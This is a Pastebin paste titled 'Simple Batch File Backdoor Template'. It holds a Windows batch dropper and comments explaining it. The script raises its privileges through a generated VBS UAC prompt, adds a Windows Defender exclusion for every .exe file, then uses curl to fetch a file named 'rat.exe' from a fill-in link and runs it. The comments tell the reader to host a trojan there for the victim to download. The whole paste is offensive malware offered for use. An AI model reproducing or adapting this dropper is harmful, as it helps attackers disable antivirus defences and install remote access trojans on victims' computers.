FlyFar

Simple Batch File Backdoor Template

Jun 28th, 2023
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.35 KB | Cybersecurity | 0 0
  1. @echo off
  2. :: In the above code, we need to change a bit in the second line of code from the bottom, please create a direct download link to your :: computer, and make sure that the link contains a trojan virus, malware, etc. you want, next is to name the backdoor that you want to :: download to the victim's computer, let's name it rat.exe. So we have created the Backdoor. Now I will explain how it works.
  3. ::
  4. :: ======================= HOW IT WORKS =========================================
  5. ::
  6. :: This script grants administrator privileges, then downloads and executes a file named “rat.exe” from a remote server. First, I used :: the cacls command to check the above permissions. the system file is located at “%SYSTEMROOT%\system32\config\system”. If the      :: command fails, the script will switch to the UACPrompt label, which will generate a VB (Visual Basic) script that prompts the victim :: to run the script with administrator privileges. If the cacls command gives no errors then the script jumps to the gotAdmin label :: :: and proceeds to execute the rest. We can see that the label gotAdmin changes to the directory containing the pushd and CD commands. :: It will then run a PowerShell command to set the option for file exclusion extensions to exe. Finally, it switches to the %TEMP%   :: directory and uses the curl command to download “rat.exe” from a remote server. It will then run the downloaded file using the     :: rat.exe command.
  7. ::
  8. :: Thus, this Backdoor works very simply, if the machine installs 2 or more Antivirus, this Backdoor becomes useless, and the victim   :: will detect it.
  9. ::
  10. :: ======================================== THE CODE STARTS HERE ================================================================
  11. ::
  12. >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
  13. if '%errorlevel%' NEQ '0' (
  14.     goto UACPrompt
  15. ) else ( goto gotAdmin )
  16. :UACPrompt
  17.     echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
  18.     set params = %*:"=""
  19.     echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
  20.     "%temp%\getadmin.vbs"
  21.     del "%temp%\getadmin.vbs"
  22.     exit /B
  23. :gotAdmin
  24.     pushd "%CD%"
  25.     CD /D "%~dp0"
  26. Powershell -Command "Set-MpPreference -ExclusionExtension exe"
  27. cd %TEMP%
  28. curl "paste your backdoor link here" -o rat.exe
  29. rat.exe
Add Comment
Please, Sign In to add comment